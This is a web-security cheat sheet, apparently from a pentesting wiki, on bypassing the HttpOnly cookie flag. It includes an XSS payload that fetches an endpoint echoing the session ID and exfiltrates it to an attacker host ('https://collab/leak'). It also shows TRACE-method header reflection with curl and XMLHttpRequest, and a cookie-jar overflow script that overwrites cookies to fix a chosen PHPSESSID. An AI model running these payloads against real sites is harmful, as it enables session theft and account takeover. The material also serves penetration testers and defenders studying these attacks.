HttpOnly Cookie Attribute#

When this attribute is set to True, will prevent client from access cookie (via JavaScript). Specifically, when calling document.cookie, it will just return nothing

Bypass HTTPOnly#

Header Reflection#

If the page is sending the cookies as the response of a requests (for example in a PHPinfo page), it’s possible to abuse the XSS to send a request to this page and steal the cookies from the response

If any server-side endpoint echoes the raw session ID in the HTTP response (e.g., inside HTML comments or a debug block), you can bypass HttpOnly by using an XSS gadget to fetch that endpoint, regex the secret, and exfiltrate it.

Example XSS payload pattern:

// Extract content between <!-- startscrmprint --> ... <!-- stopscrmprint -->
const re = /<!-- startscrmprint -->([\s\S]*?)<!-- stopscrmprint -->/;
fetch('/index.php?module=Touch&action=ws')
	.then(r => r.text())
    .then(t => { 
		const m = re.exec(t);
		if (m) fetch(
			  'https://collab/leak', 
			  {method:'POST', body: JSON.stringify({leak: btoa(m[1])})}
		);
	});

TRACE HTTP Method#

This could also be bypassed with TRACE HTTP method

TRACE method will reflect back the request we sent on the response body, including headers. For example, we can send this request with curl, we can see the Cookie header in the response body

$ curl -X TRACE -b 'name=value' 127.0.0.1

TRACE / HTTP/1.1
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5
Host: 127.0.0.1
Accept: */*
Cookie: name=value

However, there is a big catch. TRACE method is blocked on most websites

Not only that, if you attempt to send TRACE method using JavaScript:

var xmlhttp = new XMLHttpRequest();
var url = 'http://127.0.0.1/';

xmlhttp.withCredentials = true; // send cookie header
xmlhttp.open('TRACE', url, false);
xmlhttp.send();

• In Firefox 19.0.2 it will not work and return a “Illegal Value” error.
• In Google Chrome 25.0.1364.172 it will not work and return a “Uncaught Error: SecurityError: DOM Exception 18” error.

This is because modern browsers now block the TRACE method in XMLHttpRequest to help mitigate XST.

This is a serious vulnerability that is easy to exploit and critical impact (session smuggling). Chances are, you probably won’t find it in the wild

Source: https://owasp.org/www-community/attacks/Cross_Site_Tracing

Cookie Jar Overflow#

The browsers have a limit on the number of cookies that they can store for a page. We can overflow the cookie jar and the oldest ones will be deleted

Then, we can overwrite HttpOnly cookies by overflowing it and then reset it with the value we want. This is a session fixation attack

// Set many cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i}; Secure`
}

// Set our controlled session
document.cookie = 'PHPSESSID=bb1410e408ed19ee2d1991f400ee7a08'

// Remove all cookies
for (let i = 0; i < 700; i++) {
  document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

Note that third party cookies pointing to a different domain won’t be overwritten